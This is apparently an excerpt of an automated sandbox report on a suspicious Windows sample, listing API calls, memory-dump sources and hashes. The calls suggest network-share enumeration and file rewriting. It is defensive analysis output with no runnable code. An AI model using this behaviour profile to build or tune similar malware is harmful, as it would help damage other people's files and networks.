      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$CloseHeapModuleProcess$AddressAllocCreateFileNameProc
      • String ID: D
      • API String ID: 3648169817-2746444292
      • Opcode ID: db1955a8152a45f59732a00a55883f0703fcf1eef0035d75cda6f39e0aa6c489
      • Instruction ID: 514857a528a4f784b1497b21fa8026961a5426b89808912363ce9be79f40d2fd
      • Opcode Fuzzy Hash: db1955a8152a45f59732a00a55883f0703fcf1eef0035d75cda6f39e0aa6c489
      • Instruction Fuzzy Hash: 9211C8B291031D7FD710ABE4DC4A9DFBF7DEF45720F100026F605A6082D6709A518A91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,0020A208,00000104,?,i. ,002011AD,?,?), ref: 0020397F
      • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00203996
      • CloseHandle.KERNEL32(00000000), ref: 002039AB
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$CloseCreateHandleWrite
      • String ID: i.
      • API String ID: 1065093856-2284716121
      • Opcode ID: ce519f16b16e542e16f84bdeb33733e0925d05b1209c0682a21801df4d510c09
      • Instruction ID: 8f6d6fdce32783979028282a7eb0ccbee19c173346d65230f0c04c63e634143a
      • Opcode Fuzzy Hash: ce519f16b16e542e16f84bdeb33733e0925d05b1209c0682a21801df4d510c09
      • Instruction Fuzzy Hash: F0F01C72202228BFDB205B66AC4CEEB7E6DEB866B5B404124F909D2191D6709E05D6A1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 002032FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,002056C4), ref: 0020331E
        • Part of subcall function 002032FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00203371
        • Part of subcall function 002032FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 0020337B
        • Part of subcall function 002032FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00203386
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
        • Part of subcall function 00203D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,002048E0,?), ref: 00203D8C
        • Part of subcall function 00203D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00203DA1
      • CreateThread.KERNEL32(00000000,00000001,002054BF,?,00000000,00000000), ref: 00205746
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002057A4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 002057B9
      • CloseHandle.KERNEL32(?), ref: 002057CB
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Create$Event$HandleHeapWait$AddressAllocCloseCountCriticalInitializeModuleMultipleObjectObjectsProcProcessSectionSingleSpinThread
      • String ID:
      • API String ID: 4076096208-0
      • Opcode ID: 5c2059dcb9a03c8c4fd2e3e243fbcfdbac2ec8a7414d5fff2a5c6e4d43e327dc
      • Instruction ID: c54dc4c04ef5dfd6b1f01c506e40241eaf317657a17cbe225f11ed81e3e50a28
      • Opcode Fuzzy Hash: 5c2059dcb9a03c8c4fd2e3e243fbcfdbac2ec8a7414d5fff2a5c6e4d43e327dc
      • Instruction Fuzzy Hash: 2741E671224712AFD710AF20DCC6E2BB7A8EF44710F100629F951961E3EB61ECB48F91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 00208B7C
      • __aulldiv.LIBCMT ref: 00208BAB
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000003,00000000), ref: 00208BE9
      • ReadFile.KERNEL32(?,?,00040000,?,00000000), ref: 00208C0E
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Pointer$Read__aulldiv
      • String ID:
      • API String ID: 3696392486-0
      • Opcode ID: cddbccd007675233648d3206dba1e3acf06c16f6ec20411f6d95ce2f5791ab0b
      • Instruction ID: e6b7035b98a5ca81909ec41d192b781877d25a0c0623103d86ebe338bd3a6c45
      • Opcode Fuzzy Hash: cddbccd007675233648d3206dba1e3acf06c16f6ec20411f6d95ce2f5791ab0b
      • Instruction Fuzzy Hash: FF317FB1D11329AFDF20CFA5CC84AAFBBB8EB04754F140026F940B2291D7708A51CBA5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,?), ref: 002037A7
      • AllocConsole.KERNEL32 ref: 002037C0
      • GetStdHandle.KERNEL32(000000F5), ref: 002037C8
      • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0020381C
        • Part of subcall function 002090A1: GetProcessHeap.KERNEL32(00000000,0020633F,002062A2,00000000,00000010,00000000,00000020,0020633F,00000040,00202A6F,0020B410), ref: 002090A7
        • Part of subcall function 002090A1: HeapFree.KERNEL32(00000000), ref: 002090AE
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocProcess$ConsoleCountCreateCriticalFileFreeHandleInitializeSectionSpin
      • String ID:
      • API String ID: 1040683013-0
      • Opcode ID: 16a65da650b1452af9600514ef66dd6d7f79b70c13727c6a0198d20204ad312c
      • Instruction ID: aab056ed55d6407195be600fc56d77e650c517d683d02c3bd4fc686715f593cd
      • Opcode Fuzzy Hash: 16a65da650b1452af9600514ef66dd6d7f79b70c13727c6a0198d20204ad312c
      • Instruction Fuzzy Hash: 572166B26203033BE3206F259C89F7B362DAF51731F004234F916A10C3DB648EE18AE2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 002086EA
      • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00208713
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00208737
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00208766
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite
      • String ID:
      • API String ID: 539440098-0
      • Opcode ID: fa1b3a1651b0cbda4de4e9d40225617969b755fb31607ad92bf0b7ba3defcea9
      • Instruction ID: ffb9656797a35be99bb391521640cc3a18294543e5519f9265798a4749adc84c
      • Opcode Fuzzy Hash: fa1b3a1651b0cbda4de4e9d40225617969b755fb31607ad92bf0b7ba3defcea9
      • Instruction Fuzzy Hash: B521277991030AABDF109FA5CC80EAFFBF9FB48780F104529E441A21A5EB719A11CF61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,002056C4), ref: 0020331E
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00203371
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 0020337B
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00203386
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEvent$Heap$AllocCountCriticalInitializeProcessSectionSpin
      • String ID:
      • API String ID: 1287423427-0
      • Opcode ID: 44201dc5f8bac0cf40ab7a3ea29ceba785f81a6869a7bce85bdd45eb36b2835f
      • Instruction ID: e6c62e4cb949a8b71dc1f404e14189453b4237cd2322531f61e955c592ec6d26
      • Opcode Fuzzy Hash: 44201dc5f8bac0cf40ab7a3ea29ceba785f81a6869a7bce85bdd45eb36b2835f
      • Instruction Fuzzy Hash: 35218BB16207019FD730EF6689C5B56F6EDBF44B00F40846EF689975C2CBB0D9808B90
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountTick$select
      • String ID:
      • API String ID: 2350311442-0
      • Opcode ID: 1cc57dd7349bc4652b8065e6211caed9bde6cdc84624b65ccd84fd370261f862
      • Instruction ID: 9444583971da963522fc2e9c4d4b5e9d890feec789e30149c3a56ea5e3128c1e
      • Opcode Fuzzy Hash: 1cc57dd7349bc4652b8065e6211caed9bde6cdc84624b65ccd84fd370261f862
      • Instruction Fuzzy Hash: 5E110DB1D1022DABDB14EFA4DC89BDEB7BCAF08700F5041A6A705E6181D6749A458F91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateThread.KERNEL32(00000000,00000000,00204B85,00000000,00000000,00000000), ref: 00204D8A
      • WaitForSingleObject.KERNEL32(00000000,00000000,?,00204DDD,00000000,00000000,?,00000000,?,00202C9F,0000002C), ref: 00204D98
      • GetExitCodeThread.KERNEL32(00000000,?,?,00204DDD,00000000,00000000,?,00000000,?,00202C9F,0000002C), ref: 00204DA7
      • CloseHandle.KERNEL32(00000000,?,00204DDD,00000000,00000000,?,00000000,?,00202C9F,0000002C), ref: 00204DB1
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Thread$CloseCodeCreateExitHandleObjectSingleWait
      • String ID:
      • API String ID: 478055939-0
      • Opcode ID: 6b21ca8182ebf339a40231ff4c46e2254b1afe107fc4e22c7ba3ebf165014289
      • Instruction ID: 618fbcf9c463c8b377b63a90b9366fecb2aedb5dae2fdc8abdb748e3b18ca1ba
      • Opcode Fuzzy Hash: 6b21ca8182ebf339a40231ff4c46e2254b1afe107fc4e22c7ba3ebf165014289
      • Instruction Fuzzy Hash: 9EF03AB1512328FBC721AB65AD4CDEFBEBDEE86B607504005F90592152E7348A019AE2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • LeaveCriticalSection.KERNEL32(?), ref: 002034B9
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002034C3
      • EnterCriticalSection.KERNEL32(?), ref: 002034CA
        • Part of subcall function 002033F3: SetEvent.KERNEL32(00000004), ref: 00203459
        • Part of subcall function 002033F3: ResetEvent.KERNEL32(00000000), ref: 00203462
      • LeaveCriticalSection.KERNEL32(?), ref: 002034DD
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeave$EnterObjectResetSingleWait
      • String ID:
      • API String ID: 3328302011-0
      • Opcode ID: a73bdf4dbe92043e66cd009bad9ad625882c28613fab64f4c15bae4403fbef16
      • Instruction ID: c11e4e895ec1da2c0eb0666288780332d095610b77b1baf7a67f6989e11aaf13
      • Opcode Fuzzy Hash: a73bdf4dbe92043e66cd009bad9ad625882c28613fab64f4c15bae4403fbef16
      • Instruction Fuzzy Hash: 98F02732420309FBC7019B68ED88E8A7B7DEF043707104111F402920A3DB71DD148BA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(00201FEB,00201FDB,00000000,00000000,00205906,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 002053EE
      • SetEvent.KERNEL32(A0A815FF,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 00205404
      • SetEvent.KERNEL32(8B0020A0,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 00205416
      • LeaveCriticalSection.KERNEL32(00201FEB,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 0020541F
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalEventSection$EnterLeave
      • String ID:
      • API String ID: 2034477713-0
      • Opcode ID: 7fa4530f762cca43d6925de08e28f366aeb7c8b4d1f26d3f537cfbda582607e2
      • Instruction ID: a6eed09a9078792d7f8e5d344caaa47e2fdbcdfb2635a38758e1b63a33120164
      • Opcode Fuzzy Hash: 7fa4530f762cca43d6925de08e28f366aeb7c8b4d1f26d3f537cfbda582607e2
      • Instruction Fuzzy Hash: 38F082721207259BC7305F28EC44897B7A9EF043623215A25E892D31A2D331EC558E60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
        • Part of subcall function 0020530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00202195), ref: 00205327
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00202195), ref: 00205347
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00202195), ref: 00205352
      • GetComputerNameW.KERNEL32(00000010,00000008), ref: 002021D5
      • Sleep.KERNEL32(00002710), ref: 00202297
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEventHeap$AllocComputerCountCriticalInitializeNameProcessSectionSleepSpin
      • String ID: \\?\UNC\\\e-
      • API String ID: 2761037825-4184602625
      • Opcode ID: c4efcd33c97c6611923efa467c16ef7e5724f3e9f03a57d24420271f50f15ce6
      • Instruction ID: e3f68eade94a0eb02299f3b78007174c2f133599cf48f0bbb283cebb03d31a82
      • Opcode Fuzzy Hash: c4efcd33c97c6611923efa467c16ef7e5724f3e9f03a57d24420271f50f15ce6
      • Instruction Fuzzy Hash: 19418272910308BAEB11EBA4DC46FAF777DAF41750F200055FE04A61C3D6709FA48EA5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 002020F9
      • WNetUseConnectionW.MPR(00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 00202126
        • Part of subcall function 00201E10: WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 00201E66
        • Part of subcall function 00201E10: WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00201E83
        • Part of subcall function 00201E10: WNetEnumResourceW.MPR(?,?,?,?), ref: 00202046
        • Part of subcall function 00201E10: WNetCloseEnum.MPR(?), ref: 0020205E
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$Resource$AddressCloseConnectionOpenString
      • String ID: \\e-
      • API String ID: 2373711962-2557246277
      • Opcode ID: 3a504d27f534e3deeea0fccaf5484086c350da9ef7e2e122b0fb2da8c5e3fd37
      • Instruction ID: d65350d5fc8f218092af2b97d8e0136ef1dd3093b0012f83f8b2f934c9c65108
      • Opcode Fuzzy Hash: 3a504d27f534e3deeea0fccaf5484086c350da9ef7e2e122b0fb2da8c5e3fd37
      • Instruction Fuzzy Hash: DA213D72518305AFD700DFA9C885A9BB7EDFF48714F40492EF698C2291E771E6188B92
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 002024F8
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocCreateProcessThread
      • String ID: $- " $"
      • API String ID: 490627656-3440885910
      • Opcode ID: 0a2648d7f87729cd85c11189c922b50d38a5381f2b86df86ba1cbcd397224792
      • Instruction ID: bbf703854d70a8155f368ba9867257edaceb474432df32f39600dbb972079714
      • Opcode Fuzzy Hash: 0a2648d7f87729cd85c11189c922b50d38a5381f2b86df86ba1cbcd397224792
      • Instruction Fuzzy Hash: EAF01CB1124309AFCB0CCF55E885D5B7BEAEF88310B14C669F90C8B262E230D8518BA4
      Uniqueness

      Uniqueness Score: -1.00%